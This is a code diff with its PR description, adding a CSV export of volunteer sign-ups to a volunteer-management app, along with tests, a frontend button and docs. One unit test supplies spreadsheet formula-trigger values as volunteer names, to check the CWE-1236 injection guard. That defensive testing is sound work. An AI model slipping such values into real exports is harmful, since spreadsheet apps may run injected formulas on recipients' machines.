+			DefaultOrgId.Value,
+			"Test Org",
+			volunteerId,
+			null,
+			null,
+			"Pending",
+			IsCheckedIn: false,
+			HasFeedback: false,
+			DateTimeOffset.UtcNow);
+
+		_readRepository
+			.GetForExportAsync(Arg.Any<VolunteerOpportunityId>(), Arg.Any<CancellationToken>())
+			.Returns([engagement]);
+		_keycloakUserService
+			.GetUserProfilesAsync(Arg.Any<IReadOnlyList<Guid>>(), Arg.Any<CancellationToken>())
+			.Returns(new Dictionary<Guid, KeycloakUserProfile>
+			{
+				[volunteerId] = new KeycloakUserProfile(volunteerId, "vera", "Vera; The Helper", null, "vera@example.com"),
+			});
+
+		var query = new ExportEngagementsQuery(DefaultOpportunityId, DefaultRequestingUserId);
+
+		var file = await _sut.Handle(query, cancellationToken);
+
+		file.Content.Should().Contain("\"Vera; The Helper\";Pending");
+	}
+
+	[Test]
+	public async Task Handle_ShouldLocalizeHeaderStatusAndLabels_InRequestingOrganizersPreferredLanguage(
+		CancellationToken cancellationToken)
+	{
+		var organizer = User.Create(DefaultRequestingUserId);
+		organizer.SetPreferredLanguage("de");
+		_dbContext.GetOrCreateUsersAsync(Arg.Any<IReadOnlyCollection<UserId>>(), Arg.Any<CancellationToken>())
+			.Returns([organizer]);
+
+		var engagement = new EngagementSummary(
+			Guid.NewGuid(),
+			DefaultOpportunityId.Value,
+			"Test Opportunity",
+			DefaultOrgId.Value,
+			"Test Org",
+			VolunteerId: null,
+			null,
+			null,
+			"Confirmed",
+			IsCheckedIn: true,
+			HasFeedback: false,
+			DateTimeOffset.UtcNow);
+
+		_readRepository
+			.GetForExportAsync(Arg.Any<VolunteerOpportunityId>(), Arg.Any<CancellationToken>())
+			.Returns([engagement]);
+
+		var query = new ExportEngagementsQuery(DefaultOpportunityId, DefaultRequestingUserId);
+
+		var file = await _sut.Handle(query, cancellationToken);
+
+		file.Content.Should().StartWith(
+			"sep=;\r\nName;Status;Zeitslot (Europe/Berlin);Check-in-Status;Feedback-Bewertung\r\n");
+		file.Content.Should().Contain("Anonymisierte:r Freiwillige:r;Bestätigt;;Eingecheckt;\r\n");
+	}
+
+	[Test]
+	[Arguments("=SUM(A1:A9)")]
+	[Arguments("+1234567")]
+	[Arguments("-1234567")]
+	[Arguments("@example")]
+	public async Task Handle_ShouldPrefixNameWithASingleQuote_WhenItStartsWithAFormulaTriggerCharacter(
+		string maliciousFirstName,
+		CancellationToken cancellationToken)
+	{
+		// Arrange - CWE-1236: a spreadsheet app treats a cell starting with any of
+		// these characters as a formula to evaluate; the Name column comes straight
+		// from a volunteer's caller-controlled Keycloak first/last name (#1678).
+		// Tab/CR aren't exercisable through this column specifically - ResolveName's
+		// own Trim() (below) strips a leading tab or CR as whitespace before
+		// CsvEscape ever sees it - but CsvEscape still neutralizes them for any
+		// other column a future caller-controlled field might add.
+		var volunteerId = Guid.NewGuid();
+		var engagement = new EngagementSummary(
+			Guid.NewGuid(),
+			DefaultOpportunityId.Value,
+			"Test Opportunity",
+			DefaultOrgId.Value,
+			"Test Org",
+			volunteerId,
+			null,
+			null,
+			"Pending",
+			IsCheckedIn: false,
+			HasFeedback: false,
+			DateTimeOffset.UtcNow);
+
+		_readRepository
+			.GetForExportAsync(Arg.Any<VolunteerOpportunityId>(), Arg.Any<CancellationToken>())
+			.Returns([engagement]);
+		_keycloakUserService
+			.GetUserProfilesAsync(Arg.Any<IReadOnlyList<Guid>>(), Arg.Any<CancellationToken>())
+			.Returns(new Dictionary<Guid, KeycloakUserProfile>
+			{
+				[volunteerId] = new KeycloakUserProfile(volunteerId, "vera", maliciousFirstName, null, "vera@example.com"),
+			});
+
+		var query = new ExportEngagementsQuery(DefaultOpportunityId, DefaultRequestingUserId);
+
+		// Act
+		var file = await _sut.Handle(query, cancellationToken);
+
+		// Assert
+		file.Content.Should().Contain($"'{maliciousFirstName}");
+	}
+
+	private static VolunteerOpportunity CreateDefaultOpportunity() =>
+		VolunteerOpportunity.Create(DefaultOrgId, "Test", "Test", false, DefaultAddress, Occurrence.OneTime, ParticipationType.ScheduledSlots, CheckInMethod.None, Substitute.For<IPinGenerator>(), status: OpportunityStatus.Draft).Value;
+}

--- a/backend/tests/IntegrationTests/ApiClient.cs
+++ b/backend/tests/IntegrationTests/ApiClient.cs
@@ -479,6 +479,11 @@ namespace IntegrationTests
         /// <param name="cancellationToken">A cancellation token that can be used by other objects or threads to receive notice of cancellation.</param>
         /// <returns>OK</returns>
         /// <exception cref="ApiException">A server side error occurred.</exception>
+        System.Threading.Tasks.Task ExportEngagementsAsync(System.Guid opportunityId, System.Threading.CancellationToken cancellationToken = default(System.Threading.CancellationToken));
+
+        /// <param name="cancellationToken">A cancellation token that can be used by other objects or threads to receive notice of cancellation.</param>
+        /// <returns>OK</returns>
+        /// <exception cref="ApiException">A server side error occurred.</exception>
         System.Threading.Tasks.Task<EngagementStatusResponse> ConfirmEngagementAsync(System.Guid engagementId, System.Threading.CancellationToken cancellationToken = default(System.Threading.CancellationToken));
 
         /// <param name="cancellationToken">A cancellation token that can be used by other objects or threads to receive notice of cancellation.</param>
@@ -10542,6 +10547,116 @@ namespace IntegrationTests
                                 throw new ApiException("Response was null which was not expected.", status_, objectResponse_.Text, headers_, null);
                             }
                             throw new ApiException<ProblemDetails>("Not Found", status_, objectResponse_.Text, headers_, objectResponse_.Object, null);
+                        }
+                        else
+                        {
+                            var responseData_ = response_.Content == null ? null : await ReadAsStringAsync(response_.Content, cancellationToken).ConfigureAwait(false);
+                            throw new ApiException("The HTTP status code of the response was not expected (" + status_ + ").", status_, responseData_, headers_, null);
+                        }
+                    }
+                    finally
+                    {
+                        if (disposeResponse_)
+                            response_.Dispose();
+                    }
+                }
+            }
+            finally
+            {
+                if (disposeClient_)
+                    client_.Dispose();
+            }
+        }
+
+        /// <param name="cancellationToken">A cancellation token that can be used by other objects or threads to receive notice of cancellation.</param>
+        /// <returns>OK</returns>
+        /// <exception cref="ApiException">A server side error occurred.</exception>
+        public virtual async System.Threading.Tasks.Task ExportEngagementsAsync(System.Guid opportunityId, System.Threading.CancellationToken cancellationToken = default(System.Threading.CancellationToken))
+        {
+            if (opportunityId == null)
+                throw new System.ArgumentNullException("opportunityId");
+
+            var client_ = _httpClient;
+            var disposeClient_ = false;
+            try
+            {
+                using (var request_ = new System.Net.Http.HttpRequestMessage())
+                {
+                    request_.Method = new System.Net.Http.HttpMethod("GET");
+
+                    var urlBuilder_ = new System.Text.StringBuilder();
+                
+                    // Operation Path: "v1/volunteer-opportunities/{opportunityId}/engagements/export"
+                    urlBuilder_.Append("v1/volunteer-opportunities/");
+                    urlBuilder_.Append(System.Uri.EscapeDataString(ConvertToString(opportunityId, System.Globalization.CultureInfo.InvariantCulture)));
+                    urlBuilder_.Append("/engagements/export");
+
+                    PrepareRequest(client_, request_, urlBuilder_);
+
+                    var url_ = urlBuilder_.ToString();
+                    request_.RequestUri = new System.Uri(url_, System.UriKind.RelativeOrAbsolute);
+
+                    PrepareRequest(client_, request_, url_);
+
+                    var response_ = await client_.SendAsync(request_, System.Net.Http.HttpCompletionOption.ResponseHeadersRead, cancellationToken).ConfigureAwait(false);
+                    var disposeResponse_ = true;
+                    try
+                    {
+                        var headers_ = new System.Collections.Generic.Dictionary<string, System.Collections.Generic.IEnumerable<string>>();
+                        foreach (var item_ in response_.Headers)
+                            headers_[item_.Key] = item_.Value;
+                        if (response_.Content != null && response_.Content.Headers != null)
+                        {
+                            foreach (var item_ in response_.Content.Headers)
+                                headers_[item_.Key] = item_.Value;
+                        }
+
+                        ProcessResponse(client_, response_);
+
+                        var status_ = (int)response_.StatusCode;
+                        if (status_ == 200)
+                        {
+                            return;
+                        }
+                        else
+                        if (status_ == 401)
+                        {
+                            var objectResponse_ = await ReadObjectResponseAsync<ProblemDetails>(response_, headers_, cancellationToken).ConfigureAwait(false);
+                            if (objectResponse_.Object == null)
+                            {
+                                throw new ApiException("Response was null which was not expected.", status_, objectResponse_.Text, headers_, null);
+                            }
+                            throw new ApiException<ProblemDetails>("Unauthorized", status_, objectResponse_.Text, headers_, objectResponse_.Object, null);
+                        }
+                        else
+                        if (status_ == 403)
+                        {
+                            var objectResponse_ = await ReadObjectResponseAsync<ProblemDetails>(response_, headers_, cancellationToken).ConfigureAwait(false);
+                            if (objectResponse_.Object == null)
+                            {
+                                throw new ApiException("Response was null which was not expected.", status_, objectResponse_.Text, headers_, null);
+                            }
+                            throw new ApiException<ProblemDetails>("Forbidden", status_, objectResponse_.Text, headers_, objectResponse_.Object, null);
+                        }
+                        else
+                        if (status_ == 404)
+                        {
+                            var objectResponse_ = await ReadObjectResponseAsync<ProblemDetails>(response_, headers_, cancellationToken).ConfigureAwait(false);
+                            if (objectResponse_.Object == null)
+                            {
+                                throw new ApiException("Response was null which was not expected.", status_, objectResponse_.Text, headers_, null);
+                            }
+                            throw new ApiException<ProblemDetails>("Not Found", status_, objectResponse_.Text, headers_, objectResponse_.Object, null);
+                        }
+                        else
+                        if (status_ == 500)
+                        {
+                            var objectResponse_ = await ReadObjectResponseAsync<ProblemDetails>(response_, headers_, cancellationToken).ConfigureAwait(false);
+                            if (objectResponse_.Object == null)
+                            {
+                                throw new ApiException("Response was null which was not expected.", status_, objectResponse_.Text, headers_, null);
+                            }
+                            throw new ApiException<ProblemDetails>("Internal Server Error", status_, objectResponse_.Text, headers_, objectResponse_.Object, null);
                         }
                         else
                         {

--- a/backend/tests/IntegrationTests/EngagementReadRepositoryTests.cs
+++ b/backend/tests/IntegrationTests/EngagementReadRepositoryTests.cs
@@ -769,4 +769,85 @@ public class EngagementReadRepositoryTests(IntegrationTestFixture fixture)
 
 		upcoming.Items.Select(e => e.Id).Should().ContainInOrder(soonerEngagement.Id.Value, laterEngagement.Id.Value);
 	}
+
+	// --- GetForExportAsync (#1045) ---
+
+	[Test]
+	public async Task GetForExportAsync_ShouldIncludeTimeSlotTimesAndFeedbackRating(
+		CancellationToken cancellationToken)
+	{
+		await using var dbContext = fixture.CreateApplicationDbContext();
+
+		var organization = DomainOrganization.Create(DomainOrganizationId.New(), $"ExportOrg_{Guid.NewGuid()}").GetValueOrThrow();
+		dbContext.Set<DomainOrganization>().Add(organization);
+
+		var opportunity = VolunteerOpportunity.Create(
+			organization.Id, "Titel", "Beschreibung", false, DefaultAddress, Occurrence.OneTime,
+			ParticipationType.ScheduledSlots, CheckInMethod.None, new NoOpPinGenerator(),
+			status: OpportunityStatus.Draft).GetValueOrThrow();
+		var slot = opportunity.AddTimeSlot(
+			DateTimeOffset.UtcNow.AddDays(1), DateTimeOffset.UtcNow.AddDays(1).AddHours(2), 10, DateTimeOffset.UtcNow).GetValueOrThrow();
+		await dbContext.VolunteerOpportunities.AddAsync(opportunity, cancellationToken);
+		await dbContext.SaveChangesAsync(cancellationToken);
+
+		var engagement = Engagement.CreateSlotSignUp(opportunity.Id, UserId.New(), slot.Id);
+		engagement.Confirm().ThrowIfFailure();
+		engagement.CheckIn().ThrowIfFailure();
+		engagement.SubmitFeedback(4, "Great shift", DateTimeOffset.UtcNow).ThrowIfFailure();
+		await dbContext.Engagements.AddAsync(engagement, cancellationToken);
+		await dbContext.SaveChangesAsync(cancellationToken);
+
+		var repository = new EngagementReadRepository(dbContext);
+
+		var items = await repository.GetForExportAsync(opportunity.Id, cancellationToken);
+
+		var item = items.Should().ContainSingle().Which;
+		item.Should().BeEquivalentTo(new
+		{
+			OpportunityTitle = "Titel",
+			OrganizationName = organization.Name,
+			IsCheckedIn = true,
+			FeedbackRating = 4,
+		}, options => options.ExcludingMissingMembers());
+		// Postgres timestamptz has microsecond precision vs. DateTimeOffset's
+		// 100ns ticks, so a round-tripped value can differ by a sub-microsecond
+		// rounding error - the same reason other tests in this file compare
+		// timestamps loosely rather than for exact equality.
+		item.TimeSlotStartDateTime.Should().BeCloseTo(slot.StartDateTime, TimeSpan.FromMilliseconds(1));
+		item.TimeSlotEndDateTime.Should().BeCloseTo(slot.EndDateTime, TimeSpan.FromMilliseconds(1));
+	}
+
+	[Test]
+	public async Task GetForExportAsync_ShouldLeaveTimeSlotAndFeedbackNull_ForIndividualContactEngagement(
+		CancellationToken cancellationToken)
+	{
+		await using var dbContext = fixture.CreateApplicationDbContext();
+
+		var organization = DomainOrganization.Create(DomainOrganizationId.New(), $"ExportOrg_{Guid.NewGuid()}").GetValueOrThrow();
+		dbContext.Set<DomainOrganization>().Add(organization);
+
+		var opportunity = VolunteerOpportunity.Create(
+			organization.Id, "Titel", "Beschreibung", false, DefaultAddress, Occurrence.OneTime,
+			ParticipationType.IndividualContact, CheckInMethod.None, new NoOpPinGenerator(),
+			status: OpportunityStatus.Draft).GetValueOrThrow();
+		await dbContext.VolunteerOpportunities.AddAsync(opportunity, cancellationToken);
+		await dbContext.SaveChangesAsync(cancellationToken);
+
+		var engagement = Engagement.CreateIndividualContact(opportunity.Id, UserId.New(), "Please let me help").GetValueOrThrow();
+		await dbContext.Engagements.AddAsync(engagement, cancellationToken);
+		await dbContext.SaveChangesAsync(cancellationToken);
+
+		var repository = new EngagementReadRepository(dbContext);
+
+		var items = await repository.GetForExportAsync(opportunity.Id, cancellationToken);
+
+		items.Should().ContainSingle()
+			.Which.Should().BeEquivalentTo(new
+			{
+				TimeSlotStartDateTime = (DateTimeOffset?)null,
+				TimeSlotEndDateTime = (DateTimeOffset?)null,
+				FeedbackRating = (int?)null,
+				IsCheckedIn = false,
+			}, options => options.ExcludingMissingMembers());
+	}
 }

--- a/backend/tests/VisualTests/EngagementExportTests.cs
+++ b/backend/tests/VisualTests/EngagementExportTests.cs
@@ -1,0 +1,128 @@
+using System.Net.Http.Json;
+using System.Text.Json;
+using AwesomeAssertions;
+using Microsoft.Playwright;
+
+namespace VisualTests;
+
+/// <summary>
+/// Coverage for #1949: the CSV engagement export (#1045, closed by #1656) was
+/// removed four days later by #1834 for having zero end-to-end test coverage.
+/// Rebuilt with this test this time - drives a real click on the "Export"
+/// button on the engagement management page and asserts the downloaded file's
+/// name and content, not just that the button/handler exist.
+/// </summary>
+[ClassDataSource<AspireFixture>(Shared = SharedType.PerTestSession)]
+public class EngagementExportTests(AspireFixture fixture) : VisualTestBase(fixture)
+{
+	[Test]
+	public async Task EngagementManagementPage_Export_DownloadsCsvWithConfirmedVolunteersRow()
+	{
+		var frontend = Fixture.GetEndpoint("frontend");
+		var backend = Fixture.GetEndpoint("backend");
+		var keycloak = Fixture.GetEndpoint("keycloak");
+		var origin = frontend.GetLeftPart(UriPartial.Authority);
+
+		var (opportunityId, organizationId) = await CreateIndividualContactOpportunityAsync(keycloak, backend, "EngagementExport");
+		await CreateAndConfirmVeraEngagementAsync(keycloak, backend, opportunityId);
+
+		await AuthHelper.FastSignInAsync(Page, Fixture, frontend, "olaf", "olaf123");
+		await Page.GotoAsync($"{origin}/app/{organizationId}/dashboard/opportunities/{opportunityId}/engagements");
+		await Expect(Page.GetByText("Vera Volunteer")).ToBeVisibleAsync();
+
+		var download = await Page.RunAndWaitForDownloadAsync(
+			async () => await Page.GetByRole(AriaRole.Button, new() { Name = "Export" }).ClickAsync());
+
+		download.SuggestedFilename.Should().Be($"engagements-{opportunityId}.csv");
+
+		var path = await download.PathAsync();
+		path.Should().NotBeNull();
+		var content = await File.ReadAllTextAsync(path!);
+
+		// Not asserting on the Status/header column text itself: it's localized
+		// into whichever language olaf's (shared, session-wide) account happens
+		// to have as its stored preference - see ExportEngagementsQueryHandlerTests
+		// for deterministic coverage of both languages. Deliberately not setting
+		// it here via PUT /v1/users/me either - that endpoint round-trips
+		// firstName/lastName through Keycloak and blanks either one that isn't
+		// also resent (KeycloakUserService.UpdateUserAsync), which would corrupt
+		// this shared seeded account for every other test in the same session.
+		//
+		// Instead this proves the export mechanism itself end-to-end: the leading
+		// "sep=;" directive (#1675), exactly one header row plus one data row (not
+		// empty, not duplicated), and that row naming the confirmed volunteer.
+		var lines = content.Split("\r\n", StringSplitOptions.RemoveEmptyEntries);
+		lines.Should().HaveCount(3);
+		lines[0].Should().Be("sep=;");
+		lines[2].Should().StartWith("Vera Volunteer;");
+	}
+
+	private static async Task<string> GetTokenAsync(Uri keycloak, string username, string password)
+	{
+		using var http = new HttpClient { BaseAddress = keycloak };
+		var response = await http.PostAsync(
+			"/realms/einsatzbereit/protocol/openid-connect/token",
+			new FormUrlEncodedContent(new Dictionary<string, string>
+			{
+				["grant_type"] = "password",
+				["client_id"] = "frontend-test",
+				["username"] = username,
+				["password"] = password,
+				["scope"] = "openid",
+			}));
+		response.EnsureSuccessStatusCode();
+		var body = await response.Content.ReadFromJsonAsync<JsonElement>();
+		return body.GetProperty("access_token").GetString()!;
+	}
+
+	private static async Task<(string OpportunityId, string OrganizationId)> CreateIndividualContactOpportunityAsync(
+		Uri keycloak, Uri backend, string label)
+	{
+		var suffix = Guid.NewGuid().ToString("N");
+
+		using var http = new HttpClient { BaseAddress = backend };
+		http.DefaultRequestHeaders.Add("Authorization", $"Bearer {await GetTokenAsync(keycloak, "olaf", "olaf123")}");
+
+		// Fresh organization rather than olaf's shared seed org - see the
+		// identical note in EngagementManagementCheckInPinTests.
+		var createOrgResponse = await http.PostAsJsonAsync(
+			"/v1/organizations",
+			new { name = $"{label} Org {suffix}" });
+		createOrgResponse.EnsureSuccessStatusCode();
+		var org = await createOrgResponse.Content.ReadFromJsonAsync<JsonElement>();
+		var organizationId = org.GetProperty("id").GetProperty("value").GetString()!;
+
+		var oppResponse = await http.PostAsJsonAsync("/v1/volunteer-opportunities", new
+		{
+			title = $"{label} {suffix}",
+			description = "Created by EngagementExportTests",
+			organizationId,
+			isRemote = true,
+			occurrence = "OneTime",
+			participationType = "IndividualContact",
+			checkInMethod = "None",
+			validUntil = DateTimeOffset.UtcNow.AddDays(30),
+			isDraft = false,
+		});
+		oppResponse.EnsureSuccessStatusCode();
+		var opportunity = await oppResponse.Content.ReadFromJsonAsync<JsonElement>();
+		return (opportunity.GetProperty("id").GetString()!, organizationId);
+	}
+
+	private static async Task CreateAndConfirmVeraEngagementAsync(Uri keycloak, Uri backend, string opportunityId)
+	{
+		using var veraHttp = new HttpClient { BaseAddress = backend };
+		veraHttp.DefaultRequestHeaders.Add("Authorization", $"Bearer {await GetTokenAsync(keycloak, "vera", "vera123")}");
+		var engagementResponse = await veraHttp.PostAsJsonAsync(
+			$"/v1/volunteer-opportunities/{opportunityId}/engagements",
+			new { message = "Export test signup" });
+		engagementResponse.EnsureSuccessStatusCode();
+		var engagement = await engagementResponse.Content.ReadFromJsonAsync<JsonElement>();
+		var engagementId = engagement.GetProperty("id").GetString()!;
+
+		using var olafHttp = new HttpClient { BaseAddress = backend };
+		olafHttp.DefaultRequestHeaders.Add("Authorization", $"Bearer {await GetTokenAsync(keycloak, "olaf", "olaf123")}");
+		var confirmResponse = await olafHttp.PostAsync($"/v1/engagements/{engagementId}/confirm", content: null);
+		confirmResponse.EnsureSuccessStatusCode();
+	}
+}

--- a/docs/Architecture/images/module-backend.puml
+++ b/docs/Architecture/images/module-backend.puml
@@ -6,7 +6,7 @@ title Level 2 - Backend API, functional modules
 
 Container_Boundary(backend, "Backend API") {
 	Component(opportunities, "Volunteer Opportunities", "Api/ + Application/ + Domain/ + Infrastructure/ VolunteerOpportunities", "Opportunity lifecycle (draft, publish, unpublish, cancel), time slots and series, categories/tags, banner images, check-in PINs, address geocoding.")
-	Component(engagements, "Engagements", "Api/ + Application/ + Domain/ Engagements", "Sign-up, withdrawal, confirmation and cancellation, check-in, feedback, reminders and calendar.")
+	Component(engagements, "Engagements", "Api/ + Application/ + Domain/ Engagements", "Sign-up, withdrawal, confirmation and cancellation, check-in, feedback, reminders, calendar and CSV export.")
 	Component(organizations, "Organizations", "Api/ + Application/ + Domain/ Organizations", "Organization profiles, memberships and roles, invitations sent by an organizer, dashboard layout.")
 	Component(invitations, "Invitations", "Api/ + Application/ Invitations", "The invitee's side of an invitation: list, accept, decline. Shares the Organizations aggregate.")
 	Component(users, "Users", "Api/ + Application/ + Domain/ Users", "Profiles, notification preferences, streaks, account deletion, admin user administration.")

--- a/docs/Architecture/src/05_building_block_view.adoc
+++ b/docs/Architecture/src/05_building_block_view.adoc
@@ -96,7 +96,7 @@ Contained Building Blocks::
 |`{Api,Application,Domain,Infrastructure}/VolunteerOpportunities/`
 
 |Engagements
-|Sign-up and withdrawal, confirmation and cancellation by the organizer, check-in, feedback, reminders and calendar.
+|Sign-up and withdrawal, confirmation and cancellation by the organizer, check-in, feedback, reminders, calendar and CSV export.
 |`{Api,Application,Domain}/Engagements/`
 
 |Organizations

--- a/frontend/src/client/api-client.ts
+++ b/frontend/src/client/api-client.ts
@@ -5662,6 +5662,67 @@ export class EinsatzbereitApi {
     /**
      * @return OK
      */
+    exportEngagements(opportunityId: string, signal?: AbortSignal): Promise<void> {
+        let url_ = this.baseUrl + "/v1/volunteer-opportunities/{opportunityId}/engagements/export";
+        if (opportunityId === undefined || opportunityId === null)
+            throw new globalThis.Error("The parameter 'opportunityId' must be defined.");
+        url_ = url_.replace("{opportunityId}", encodeURIComponent("" + opportunityId));
+        url_ = url_.replace(/[?&]$/, "");
+
+        let options_: RequestInit = {
+            method: "GET",
+            signal,
+            headers: {
+            }
+        };
+
+        return this.http.fetch(url_, options_).then((_response: Response) => {
+            return this.processExportEngagements(_response);
+        });
+    }
+
+    protected processExportEngagements(response: Response): Promise<void> {
+        const status = response.status;
+        let _headers: any = {}; if (response.headers && response.headers.forEach) { response.headers.forEach((v: any, k: any) => _headers[k] = v); };
+        if (status === 200) {
+            return response.text().then((_responseText) => {
+            return;
+            });
+        } else if (status === 401) {
+            return response.text().then((_responseText) => {
+            let result401: any = null;
+            result401 = _responseText === "" ? null : JSON.parse(_responseText, this.jsonParseReviver) as ProblemDetails;
+            return throwException("Unauthorized", status, _responseText, _headers, result401);
+            });
+        } else if (status === 403) {
+            return response.text().then((_responseText) => {
+            let result403: any = null;
+            result403 = _responseText === "" ? null : JSON.parse(_responseText, this.jsonParseReviver) as ProblemDetails;
+            return throwException("Forbidden", status, _responseText, _headers, result403);
+            });
+        } else if (status === 404) {
+            return response.text().then((_responseText) => {
+            let result404: any = null;
+            result404 = _responseText === "" ? null : JSON.parse(_responseText, this.jsonParseReviver) as ProblemDetails;
+            return throwException("Not Found", status, _responseText, _headers, result404);
+            });
+        } else if (status === 500) {
+            return response.text().then((_responseText) => {
+            let result500: any = null;
+            result500 = _responseText === "" ? null : JSON.parse(_responseText, this.jsonParseReviver) as ProblemDetails;
+            return throwException("Internal Server Error", status, _responseText, _headers, result500);
+            });
+        } else if (status !== 200 && status !== 204) {
+            return response.text().then((_responseText) => {
+            return throwException("An unexpected server error occurred.", status, _responseText, _headers);
+            });
+        }
+        return Promise.resolve<void>(null as any);
+    }
+
+    /**
+     * @return OK
+     */
     confirmEngagement(engagementId: string, signal?: AbortSignal): Promise<EngagementStatusResponse> {
         let url_ = this.baseUrl + "/v1/engagements/{engagementId}/confirm";
         if (engagementId === undefined || engagementId === null)

--- a/frontend/src/locales/de.json
+++ b/frontend/src/locales/de.json
@@ -722,6 +722,9 @@
       "bulkCancelSuccess_other": "{{count}} abgesagt.",
       "bulkCancelPartial": "{{succeeded}} abgesagt, {{failed}} fehlgeschlagen.",
       "bulkCancelError": "Fehler beim Absagen der Auswahl",
+      "exportButton": "Exportieren",
+      "exportButtonLoading": "Wird exportiert…",
+      "exportError": "Fehler beim Exportieren der Anmeldungen",
       "status": {
         "Pending": "Ausstehend",
         "Confirmed": "Bestätigt",

--- a/frontend/src/locales/en.json
+++ b/frontend/src/locales/en.json
@@ -722,6 +722,9 @@
       "bulkCancelSuccess_other": "{{count}} cancelled.",
       "bulkCancelPartial": "{{succeeded}} cancelled, {{failed}} failed.",
       "bulkCancelError": "Error cancelling selected applications",
+      "exportButton": "Export",
+      "exportButtonLoading": "Exporting…",
+      "exportError": "Error exporting sign-ups",
       "status": {
         "Pending": "Pending",
         "Confirmed": "Confirmed",

--- a/frontend/src/pages/EngagementManagementPage.tsx
+++ b/frontend/src/pages/EngagementManagementPage.tsx
@@ -1,6 +1,7 @@
 import { lazy, Suspense, useEffect, useMemo, useState } from "react";
 import { useParams, Link, useOutletContext } from "react-router";
 import { useTranslation } from "react-i18next";
+import { useAuth } from "react-oidc-context";
 import type {
 	EngagementSummary,
 	FeedbackItemDto,
@@ -9,11 +10,13 @@ import type {
 } from "../client/api-client";
 import { useApiClient } from "../hooks/useApiClient";
 import { useLoadMore } from "../hooks/useLoadMore";
+import { runtimeConfig } from "../lib/runtimeConfig";
 import ConfirmDialog from "../components/ConfirmDialog";
 import EmptyState from "../components/EmptyState";
 import Skeleton from "../components/Skeleton";
 import Button from "../components/Button";
 import Chip from "../components/Chip";
+import ErrorBanner from "../components/ErrorBanner";
 import LoadMoreError from "../components/LoadMoreError";
 import LoadMoreButton from "../components/LoadMoreButton";
 import ModalLoadingFallback from "../components/ModalLoadingFallback";
@@ -31,7 +34,12 @@ import {
 	selectClass,
 } from "../lib/formClasses";
 import { cardClass } from "../lib/surfaceClasses";
-import { CheckIconSolid, QrCodeIcon, StarIcon } from "../components/icons";
+import {
+	ArrowDownTrayIcon,
+	CheckIconSolid,
+	QrCodeIcon,
+	StarIcon,
+} from "../components/icons";
 import type { OrgAppContext } from "../layouts/OrgAppLayout";
 
 const STATUS_COLORS = ENGAGEMENT_STATUS_COLORS;
@@ -45,6 +53,7 @@ export default function EngagementManagementPage() {
 	const { opportunityId } = useParams<{ opportunityId: string }>();
 	const { isOrganizer } = useOutletContext<OrgAppContext>();
 	const api = useApiClient();
+	const auth = useAuth();
 	const { t, i18n } = useTranslation();
 	const [opportunity, setOpportunity] =
 		useState<VolunteerOpportunityDetails | null>(null);
@@ -90,6 +99,8 @@ export default function EngagementManagementPage() {
 	const [checkingIn, setCheckingIn] = useState<string | null>(null);
 	const [undoingCheckIn, setUndoingCheckIn] = useState<string | null>(null);
 	const [qrScannerOpen, setQrScannerOpen] = useState(false);
+	const [exporting, setExporting] = useState(false);
+	const [exportError, setExportError] = useState<string | null>(null);
 
 	const [selectedIds, setSelectedIds] = useState<Set<string>>(new Set());
 	const [bulkConfirming, setBulkConfirming] = useState(false);
@@ -499,6 +510,46 @@ export default function EngagementManagementPage() {
 		setCancelError(null);
 	}
 
+	// Not routed through useApiClient()/EinsatzbereitApi: NSwag has no typed
+	// response for a file-returning endpoint (see GetEngagementCalendar's
+	// generated client method, which discards the body and returns void), so
+	// this needs a raw authenticated fetch + blob download instead.
+	async function handleExport() {
+		if (!opportunityId) return;
+		setExporting(true);
+		setExportError(null);
+		try {
+			const response = await fetch(
+				`${runtimeConfig.apiUrl}/v1/volunteer-opportunities/${opportunityId}/engagements/export`,
+				{
+					headers: {
+						Authorization: `Bearer ${auth.user?.access_token ?? ""}`,
+					},
+				},
+			);
+			if (!response.ok) {
+				throw new Error(t("engagementManagement.exportError"));
+			}
+			const blob = await response.blob();
+			const url = URL.createObjectURL(blob);
+			const link = document.createElement("a");
+			link.href = url;
+			link.download = `engagements-${opportunityId}.csv`;
+			document.body.appendChild(link);
+			link.click();
+			document.body.removeChild(link);
+			URL.revokeObjectURL(url);
+		} catch (err) {
+			setExportError(
+				err instanceof Error
+					? err.message
+					: t("engagementManagement.exportError"),
+			);
+		} finally {
+			setExporting(false);
+		}
+	}
+
 	if (notFound) {
 		return <NotFoundPage />;
 	}
@@ -548,11 +599,28 @@ export default function EngagementManagementPage() {
 				</div>
 			)}
 
-			{/* The filters and the bulk-select row are one toolbar for the list
-			below, boxed like the Sign-ups and Members toolbars (#1755). They
-			were separate bare rows - two form fields on the page background,
-			then a full-width card holding a single checkbox. */}
+			{/* Export, the filters and the bulk-select row are one toolbar for
+			the list below, boxed like the Sign-ups and Members toolbars (#1755).
+			They were three separate bare rows - a right-floating Export button on
+			nothing, then two form fields on the page background, then a
+			full-width card holding a single checkbox. */}
 			<div className={`mb-6 ${cardClass} sm:p-5`}>
+				<div className="mb-4 flex justify-end">
+					<Button
+						type="button"
+						variant="outline"
+						size="sm"
+						onClick={handleExport}
+						disabled={exporting}
+					>
+						<ArrowDownTrayIcon className="h-4 w-4" />
+						{exporting
+							? t("engagementManagement.exportButtonLoading")
+							: t("engagementManagement.exportButton")}
+					</Button>
+				</div>
+				{exportError && <ErrorBanner message={exportError} className="mb-4" />}
+
 				<div className="flex flex-wrap items-end gap-3">
 					<div>
 						<label htmlFor="engagement-status-filter" className={labelClass}>


### PR DESCRIPTION
## What

Rebuilds the CSV engagement roster export for organizers: a GET endpoint (`/v1/volunteer-opportunities/{id}/engagements/export`) plus an "Export" button on the engagement management page's toolbar.

## Why

CSV engagement export was built (#1045, closed by #1656) and then deliberately removed four days later (#1834) - "no clear use case for it, and it had zero end-to-end test coverage." A repo review independently re-surfaced the same need (organizer reporting to funders, sign-in sheets) without knowing that history, and this rebuilds it with the missing coverage this time.

Closes #1949

## Testing

- **Application.UnitTests**: new `ExportEngagementsQueryHandlerTests` (14 cases - ownership/not-found guards, CSV structure, volunteer name resolution/fallbacks, Europe/Berlin timezone conversion, RFC 4180 escaping, CWE-1236 formula-injection hardening, per-organizer localization). Full suite: 1025/1025 passing.
- **IntegrationTests**: new `EngagementReadRepositoryTests.GetForExportAsync_*` (2 cases) against the read repository's real EF query.
- **VisualTests**: new `EngagementExportTests` - a real end-to-end Playwright test that signs in as an organizer, clicks the Export button, and asserts on the actual downloaded CSV file (name, structure, volunteer row) - the specific gap #1834 cited for removing this feature.
- **ArchitectureTests**: 421/421 passing (layer/naming/rate-limiting conventions).
- Frontend: `pnpm check`/`lint`/`format:check`/`i18n:check`/`test` (264/264)/`build` all pass.
